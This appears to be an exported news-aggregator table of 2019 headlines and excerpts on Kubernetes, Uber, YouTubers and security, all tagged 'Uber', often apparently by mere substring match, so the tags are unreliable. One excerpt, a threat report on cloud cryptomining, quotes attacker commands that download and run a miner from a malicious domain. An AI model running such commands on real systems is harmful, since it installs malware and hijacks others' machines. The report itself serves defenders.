Src |
Date (GMT) |
Titre |
Description |
Tags |
Stories |
Notes |
|
2019-08-01 17:15:05 |
Practicing Safe Containerisation (lien direct) |
Everyone knows that Kubernetes has won the container wars. Except what Kubernetes has won is the container runtime wars. You see, the container image war was won by Docker. That can be seen in the statistic that more than 1 billion Docker containers are downloaded every two weeks according to the State of Open Source Security Report 2019. …
The ISBuzz Post: This Post Practicing Safe Containerisation |
|
Uber
|
|
|
2019-07-30 12:09:05 |
Security a Top Concern as Containerization Gathers Pace (lien direct) |
Within the increasing adoption of container technology, two things stand out: hybrid on-prem and cloud configurations are growing, and Kubernetes dominates. At the same time, concern over investment in security remains high.
|
|
Uber
|
|
|
2019-07-26 07:19:00 |
Sécurité des mots de passe : 6 bonnes pratiques qui font la différence (lien direct) |
Un mot de passe est un peu comme une brosse à dents : il doit être bon, il ne se partage pas et se remplace chaque trimestre, selon Christophe Auberger, Director System Engineering, Fortinet. |
|
Uber
|
|
|
2019-07-23 12:36:00 |
Critical flaw in Palo Alto VPN solution impacts Uber, other enterprises may be at risk (lien direct) |
Updated: The critical vulnerability exists in old, vulnerable versions of the software still in use by companies including Uber. |
Vulnerability
|
Uber
|
|
|
2019-07-16 13:12:01 |
Developers: Build cloud-native apps for Kubernetes faster with these open source IBM tools (lien direct) |
IBM's new open source projects aim to lower the barrier for entry for developers to use Kubernetes. |
|
Uber
|
|
|
2019-07-11 13:00:00 |
\'Blitzscaling\' Is Choking Innovation-and Wasting Money (lien direct) |
Opinion: VCs are making bigger bets on fewer startups. It's this unconsidered, money-slinging strategy that led to Uber's and Lyft's dud IPOs. |
|
Uber
|
|
|
2019-07-07 11:00:00 |
Public Transit Agencies Think Rewards Programs Can Bring Back Riders (lien direct) |
Following the example set by airlines, Uber, and Lyft, public transportation officials are creating frequent-flier-like systems to goose ridership. |
|
Uber
|
★★
|
|
2019-06-29 11:00:00 |
Transit Agencies Turn to Uber for the Last Mile (lien direct) |
Transit systems worry about losing passengers to ride-hail services. But some agencies are also testing using Uber in place of low-ridership lines. |
|
Uber
|
|
|
2019-06-27 21:04:05 |
The Quiet Force of YouTuber Etika\'s Gaze (lien direct) |
We will never know for certain what more Desmond Amofah wanted to communicate-but we can hazard a guess. |
|
Uber
|
|
|
2019-06-26 20:51:02 |
Kubernetes CLI tool security flaw lets attackers run code on host machine (lien direct) |
Interesting bug can lead to total compromise of cloud production environments. |
Guideline
Tool
|
Uber
|
|
|
2019-06-26 17:08:01 |
The Psychological Impact of Seeing YouTubers Spend Millions (lien direct) |
Flexing on video has become incredibly popular. But their excess consumerism could be harming their viewers' wellbeing. |
|
Uber
|
|
|
2019-06-20 16:30:04 |
Epic Games Sues YouTuber CBV for Selling Fortnite Cheats (lien direct) |
In a lawsuit filed Tuesday, Epic Games is suing a YouTuber who goes by the name CBV for allegedly selling cheats Fornite and ruining the game for other users. [...] |
|
Uber
|
|
|
2019-06-20 11:00:04 |
MongoDB Introduces Client-Side Field Level Encryption to Aid Compliance (lien direct) |
MongoDB Inc, developer of the NoSQL MongoDB document-based database management product, has announced the latest version, 4.2. The primary new features are distributed transactions, an updated Kubernetes Operator, and client-side field level encryption.
|
|
Uber
|
|
|
2019-06-19 04:00:00 |
How to get a single-node Kubernetes deployment up in seconds (lien direct) |
How do you launch a single-node Kubernetes deployment in seconds? With the help of Microk8s. |
|
Uber
|
|
|
2019-06-18 17:03:04 |
The YouTubers Who Changed the Landscape for #NaturalHair (lien direct) |
“It's just hair, but it's more than that. Every culture has held meaning in hair." |
|
Uber
|
|
|
2019-06-15 11:00:00 |
New York City Flexes Again, Extending Cap on Uber and Lyft (lien direct) |
Officials want to extend the city's limit on the number of for-hire vehicles, and may consider a congestion charge. |
|
Uber
|
|
|
2019-06-07 22:28:03 |
Lyft\'s Lawsuit Against San Francisco Is Bigger Than Bike-Share (lien direct) |
Lyft's bike-share company, Motivate, had an exclusive contract with the city for its docked bike program. But if San Francisco allows a dockless bike program, Uber could muscle in on Lyft's territory. |
|
Uber
|
|
|
2019-06-01 13:00:00 |
The YouTuber on a Mission to Save the Classic RPG (lien direct) |
English professor Matt Barton is out to draw attention to the bygone favorites of the genre. |
|
Uber
|
|
|
2019-05-31 12:00:00 |
Generative Music Apps: Endel, Mubert, Hear (lien direct) |
Who needs Spotify playlists? These apps create truly endless tunes to match whatever mood you desire. |
|
Uber
|
|
|
2019-05-30 22:44:01 |
California Lawmakers Move to Protect Gig-Economy Workers (lien direct) |
The California Assembly passed a bill that would require services such as Uber and Lyft to classify their workers as employees, rather than contractors. |
|
Uber
|
|
|
2019-05-29 18:51:04 |
NIST\'s privacy framework lets privacy tell its own story (lien direct) |
|
|
Uber
|
|
|
2019-05-24 13:00:00 |
How to Solve a Rubik\'s Cube in 5 Seconds-or Less (lien direct) |
The world record for unscrambling a Rubik's cube keeps dropping, as fleet-fingered speedcubers hone their pattern recognition and "lookahead" skills. |
|
Uber
|
|
|
2019-05-22 13:00:03 |
CloudGuard IaaS Supports Kubernetes and Container Security (lien direct) |
By Amir Kaushansky, Product Manager, Cloudguard IaaS, published May 29th, 2019 Almost 9000 people attended Check Point's CPX 360 events in Bangkok, Las Vegas and Vienna earlier this year where we shared security best practices, product developments and roadmap with our customers and partners. My session was about Kubernetes and Container Security. At…
|
|
Uber
|
|
|
2019-05-21 18:13:00 |
Capital One\'s Critical Stack platform aims to secure cloud migration and deployment (lien direct) |
Capital One released Critical Stack, a Kubernetes container orchestration platform in an effort to cultivate a developer ecosystem. |
|
Uber
|
|
|
2019-05-21 14:40:05 |
Gigamon Launches New Tool To Shine Light On Digital Apps Within the Enterprise. (lien direct) |
Gigamon Application Intelligence provides visibility into complex digital apps, helping companies with their digital transformation A failure to transform digitally, and keep pace with the likes of Airbnb and Uber, has been cited as the main reason over half of the Fortune 500 companies have disappeared since 2000. But to successfully execute a digital transformation, […]
|
Tool
|
Uber
|
|
|
2019-05-15 12:51:00 |
ulia, Kubernetes, and Hadoop among the 20 fastest-growing freelancer skills (lien direct) |
Skills related to IT, automation, and RPA saw increased demand in Q1 2019, according to Upwork. |
|
Uber
|
|
|
2019-05-13 11:00:00 |
Why Uber Is Fighting Cities Over Data About Scooter Trips (lien direct) |
Los Angeles and other cities want detailed data on the shared scooters on their streets. Uber, Lyft and other companies fear a Trojan horse that could affect ride-hailing. |
|
Uber
|
★★★★
|
|
2019-05-12 13:00:00 |
Uber\'s Underwhelming IPO, Lyft Earnings and More Car News This Week (lien direct) |
A decade after it was founded, Uber went public. Its shares fell almost 8% on their first day of trading. |
|
Uber
|
|
|
2019-05-10 23:15:02 |
Uber\'s IPO, the Call to Break Up Facebook, and More News (lien direct) |
Catch up on the most important news today in 2 minutes or less. |
|
Uber
|
|
|
2019-05-10 13:00:00 |
A Bet on Uber Is a Bet on Self-Driving (lien direct) |
Uber is scheduled to go public Friday, at an initial valuation of $82 billion, the largest for an IPO since 2014. But its future may rest on eliminating drivers. |
|
Uber
|
|
|
2019-05-09 01:00:05 |
On Eve of Uber\'s IPO, Ride-Hail Drivers Stage Protests (lien direct) |
Uber and Lyft drivers shut their apps Wednesday to protest for better pay and benefits, and recognition as employees rather than contractors. |
|
Uber
|
|
|
2019-05-08 03:10:00 |
Scammers Try to Trick YouTubers Into Giving Up Password (lien direct) |
A scammer looking to take over a YouTube account got a big fat nothing by targeting the owner of a channel that saw right through the fraud and spread the word about the attempt. [...] |
|
Uber
|
|
|
2019-05-07 17:40:00 |
In a Kubernetes vs. AWS world, Red Hat may hold the edge (lien direct) |
Despite Amazon's embrace of Kubernetes, the open source container orchestration engine keeps dreams of a multicloud world alive. |
|
Uber
|
★★
|
|
2019-05-05 13:00:00 |
Tesla Raises Money, Drones Get Certified, and More Car News This Week (lien direct) |
Telsa says it will raise up to $2.7 billion in new capital, and Uber prepares for its IPO. |
|
Uber
Tesla
|
|
|
2019-05-03 15:00:00 |
The top six takeaways for corporate data privacy compliance (lien direct) |
Here are Labs' top six takeaways from our data privacy and cybersecurity law series on corporate data privacy compliance. From emerging startups to burgeoning enterprises, these rules help not just with legal liability, but also user trust.
Categories:
Privacy
Security world
Tags: AppleCalifornia Online Privacy Protection Actcybersecurity lawcybersecurity lawsdata breach notificationdata breach notification lawData privacydata privacy compliancedata privacy lawdata privacy lawsdata privacy legislationgdprGeneral Data Protection RegulationHelix DNAmozillaonline privacypersonal datapersonal informationpersonally identifiable informationprivacy policyprotonmailsignalUberuser privacywhatsapp
(Read more...)
|
|
Uber
|
|
|
2019-04-19 19:27:04 |
Uber Recruits Some Rich Friends to Drive Its Autonomous Cars (lien direct) |
Toyota, Japanese auto supplier Denso, and the Softbank Vision Fund are investing $1 billion in Uber's self-driving car unit. |
|
Uber
|
|
|
2019-04-12 20:49:02 |
Gadget Lab Podcast: What Happens to Uber After Its IPO? (lien direct) |
WIRED Transportation reporter Aarian Marshall joins the Gadget Lab podcast to talk about what Uber's IPO means for the future of ride-sharing ... and everything else Uber does. |
|
Uber
|
|
|
2019-04-12 00:54:03 |
Ahead of IPO, Uber\'s Losing Less-but Growing Less, Too (lien direct) |
Uber revealed its plans to go public, just weeks after rival Lyft. The filing shows Uber dwarfs Lyft, but continues to post operating losses. |
|
Uber
|
|
|
2019-04-09 19:25:02 |
Google Cloud Platform launches Cloud Run, aims to bring enterprise workloads to serverless, Kubernetes (lien direct) |
Google's aim for Cloud Run is to make it easier to run more enterprise workloads via containers, integration, and serverless functions. |
|
Uber
|
★★★★
|
|
2019-04-09 13:52:03 |
Uber launches free ride voucher program to help businesses attract and retain customers (lien direct) |
Businesses can now take advantage of Uber Vouchers to offer the perk of free rides. |
|
Uber
|
|
|
2019-04-08 13:00:00 |
Understanding “container security” (lien direct) |
Containers and container security
Do you docker? Without a doubt, containers are one of the hottest concepts in application delivery and security these days. And that’s a very good thing. Containers have tremendous advantages over the way we have done things in the past. But how should containers influence a threat detection and response strategy? Do I need a larger “container security” strategy to get started deploying my apps using container architectures?
The short answer to these questions is “No.” But let’s explore that a bit more.
What is a container?
A container is an evolution of virtualization. Traditionally, virtualization requires entire “guest operating systems” to be deployed on a hypervisor or host operating system. This was an amazing breakthrough as it blew up the traditional relationship between hardware and operating systems, enabling the deployment of different application building blocks in different VMs on the same or different hardware. Thus it created new ways to build and scale applications. This transition changed how we think about compute resources, moving us from “pets” to “cattle”. Yet each VM carried along with it an entire operating system worth of overhead.
Containers fix this problem by virtualizing only the application and all the associated dependencies it has (shared libraries, file systems, etc.), allowing many more containers to ride on a single operating system. This makes them much, much more efficient. They also have the advantage of being portable across operating systems; they are truly platform agnostic.
Docker security and Kubernetes security are simply the most well known
There are many kinds of containers, Docker is only the most popular. In addition to the containers themselves, most deployments benefit from orchestration and management tools. Kubernetes is the most well-known of these, and Swarm and Mesos are others. These tools handle all aspects of the container lifecycle, helping build consistent container images, deploy them into production, monitor their performance, and decommission them when the time comes.
Easier, safer: benefits of containers, as they relate to security
The isolation provided by containers enables us to better scale and modularize our applications into smaller pieces. But what does it do for our security? LOTS! But containers don’t fundamentally change anything we need to do in the threat detection and response area.
Containers make it extremely easy to reduce our attack surface area. In fact, Docker containers use a “Docker file” that defines many things, including what IPs, ports, and protocols the container can use for communication. Because containers are intended to be used for modular workloads, it isn’t difficult to determine what these ports and protocols should be, making it simple to realize the idea of providing only essential access while keeping things simple
Another key security advantage of containers is, of course, the isolation they provide. If the application inside your container falls victim to an attack, the attacker will find themselves in a very restricted area with only a small part of the application code and user data present. In fact, management connectivity via SSH and the like is often unnecessary in containers, making them even harder to access remotely. Of course, lateral movement or privilege escalation may be possible when vulnerabilities are present. But even if containers are compromised, they have huge advantages. Because they are designed to be ephemerial, remediation of an infected container can be as simple as blowing it |
|
Uber
|
|
|
2019-04-03 17:34:03 |
For Potential Investors in Lyft and Uber, It\'s Buyer Beware (lien direct) |
Lyft leads an expected wave of big IPOs, from Uber, Pinterest, and others. These firms are stronger than the dotcoms, but that doesn't make them good investments. |
Guideline
|
Uber
|
|
|
2019-04-03 09:35:03 |
Fans of Swedish Youtuber PewDiePie spread malware to increase channel subscriptions. (lien direct) |
PewDiePie, the famous Swedish Youtuber, is no stranger to controversy. This time he is in the news again for the wrong reason after a user, who claims to be his fan, released ransomware with a note that reads 'Subscribe to PewDiePie'. According to The Independent, the ransomware PewCrypt is designed in such a way that […]
|
Ransomware
Malware
|
Uber
|
★★★★
|
|
2019-03-28 16:40:01 |
Thoughts on OSSEC Con 2019 (lien direct) |
Last week I attended my first OSSEC conference. I first blogged about OSSEC in 2007, and wrote other posts about it in the following years.OSSEC is a host-based intrusion detection and log analysis system with correlation and active response features. It is cross-platform, such that I can run it on my Windows and Linux systems. The moving force behind the conference was a company local to me called Atomicorp.In brief, I really enjoyed this one-day event. (I had planned to attend the workshop on the second day but my schedule did not cooperate.) The talks were almost uniformly excellent and informative. I even had a chance to talk jiu-jitsu with OSSEC creator Daniel Cid, who despite hurting his leg managed to travel across the country to deliver the keynote.I'd like to share a few highlights from my notes.First, I had been worried that OSSEC was in some ways dead. I saw that the Security Onion project had replaced OSSEC with a fork called Wazuh, which I learned is apparently pronounced "wazoo." To my delight, I learned OSSEC is decidedly not dead, and that Wazuh has been suffering stability problems. OSSEC has a lot of interesting development ahead of it, which you can track on their Github repo.For example, the development roadmap includes eliminating Logstash from the pipeline used by many OSSEC users. OSSEC would feed directly into Elasticsearch. One speaker noted that Logstash has a 1.7 GB memory footprint, which astounded me.On a related note, the OSSEC team is planning to create a new Web console, with a design goal to have it run in an "AWS t2.micro" instance. The team noted that instance offers 2 GB memory, which doesn't match what AWS says. Perhaps they meant t2.micro and 1 GB memory, or t2.small with 2 GB memory. I think they mean t2.micro with 1 GB RAM, as that is the free tier. Either way, I'm excited to see this later in 2019.Second, I thought the presentation by security personnel from USA Today offered an interesting insight. One design goal they had for monitoring their Google Cloud Platform (GCP) was to not install OSSEC on every container or on Kubernetes worker nodes. Several times during the conference, speakers noted that the transient nature of cloud infrastructure is directly antithetical to standard OSSEC usage, whereby OSSEC is installed on servers with long uptime and years of service. Instead, USA Today used OSSEC to monitor HTTP logs from the GCP load balancer, logs from Google Kubernetes Engine, and monitored processes by watching output from successive kubectl invocations.Third, a speaker from Red Hat brought my attention to an aspect of containers that I had not considered. Docker and containers had made software testing and deployment a lot easier for everyone. However, those who provide containers have effectively become Linux distribution maintainers. In other words, who is responsible when a security or configuration vulnerability in a Linux component is discovered? Will the container maintainers be responsive?Another speaker emphasized the difference between "security of the cloud," offered by cloud providers, and "security in the cloud," which is supposed to be the customer\ |
Vulnerability
|
Uber
|
|
|
2019-03-27 15:42:01 |
Container adoption increasing as businesses increasingly rely on multicloud deployments (lien direct) |
Expectations that applications can be migrated seamlessly across clouds are fueling the adoption of Kubernetes and other container platforms. |
|
Uber
|
|
|
2019-03-25 09:49:05 |
PewDiePie ransomware oblige users subscribe to PewDiePie YouTube channel (lien direct) |
It is a battle with no holds barred between T-Series and PewDiePie, their fans are spreading the PewDiePie ransomware to force users to subscribe to PewDiePie Youtube channel. The story I’m going to tell you is another chapter of the battle between the most followed Youtuber T-Series and PewDiePie. T-Series is an Indian music company, […]
|
Ransomware
|
Uber
|
|
|
2019-03-20 15:05:01 |
Uber Deployed \'Surfcam Spyware\' in Australia to Crush the Competition – Report (lien direct) |
Until a report this week, Uber's Surfcam's use was thought to be limited to incidents uncovered in Singapore in 2017. For its part, Uber denies that it's a "spyware." |
|
Uber
|
|
|
2019-03-14 14:55:00 |
Making it Rain - Cryptocurrency Mining Attacks in the Cloud (lien direct) |
By Chris Doman and Tom Hegel
Organizations of all sizes have made considerable shifts to using cloud-based infrastructure for their day-to-day business operations. However, cloud security hasn't always kept up with cloud adoption, and that leaves security gaps that hackers are more than happy to take advantage of.
One of the most widely observed objectives of attacking an organization's cloud infrastructure has been for cryptocurrency mining. Despite recent falls in cryptocurrency prices, mining campaigns continue to plague organizations. Below, we've shared some of the more noteworthy forms of attack where the hackers’ end objective is to use your cloud infrastructure to mine cryptocurrency.
Compromised Container Management Platforms
We've seen attackers using open APIs and unauthenticated management interfaces to compromise container management platforms.
We recently investigated attacks involving mining malware served from the domain xaxaxa[.]eu. That domain may sound familiar, as it appeared in a February 2018 report by RedLock on the compromise of the Kubernetes infrastructure of an electric car company. The report details the container commands showing the malicious request.
RedLock reported the attackers used the compromised Kubernetes server in Amazon Web Services to mine Monero and potentially access customer data. In the event of such unrestricted access, cryptocurrency mining is one of the least malicious outcomes to victim organizations. For example, customer data and business operations could be at risk for theft or malicious modification.
Following the attention of the report by RedLock, the owners of xaxaxa[.]eu published a Public Notice stating that they are just a mining proxy and are not responsible for any malicious activity themselves.
Notably, we have also observed the domain serving pages saying it is a Dynamic Domain and a Vesta Control Panel. However, we have seen from other attacks listed in this article that the root domain is actively involved in serving malware and implicated in other campaigns.
Control Panel Exploitation
We have also observed attacks aimed at the control panels of web hosting solutions. The impact is similar to the previous topics, essentially allowing administrative control over web services for the execution of malicious code.
In April 2018, the same attackers that compromised Kubernetes infrastructure started exploiting an unknown vulnerability in VestaCP. This was followed by frantic posts on the official VestaCP forums and those of web-hosts that run VestaCP. VestaCP users provided details on how their installations were compromised.
In these attacks, they added a new backdoor user called “sysroot,” and then downloaded and installed the XMRig application to mine Monero cryptocurrency.
pkill -f xmrig;
wget -O /tmp/gcc http://xaxaxa[.]eu/gcc;
chmod +x gcc;
wget -O /tmp/config_1.json http://xaxaxa[.]eu/config_1.json;
/tmp/gcc -c /tmp/config_1.json;
Lastly, the |
Guideline
|
Uber
Tesla
|
|
|
2019-03-13 22:18:00 |
Colleges Need Influencers, but Do Influencers Need College? (lien direct) |
About a third of Gen Z wants to grow up to be YouTubers. Which doesn't really require a college education. |
|
Uber
|
|
|
2019-03-06 19:47:02 |
Waymo Is Selling the Lidar Tech It Fought Uber to Protect (lien direct) |
The shift to sell its technology to robotics and security companies is an indication that Waymo isn't placing all its bets on self-driving cars. |
|
Uber
|
|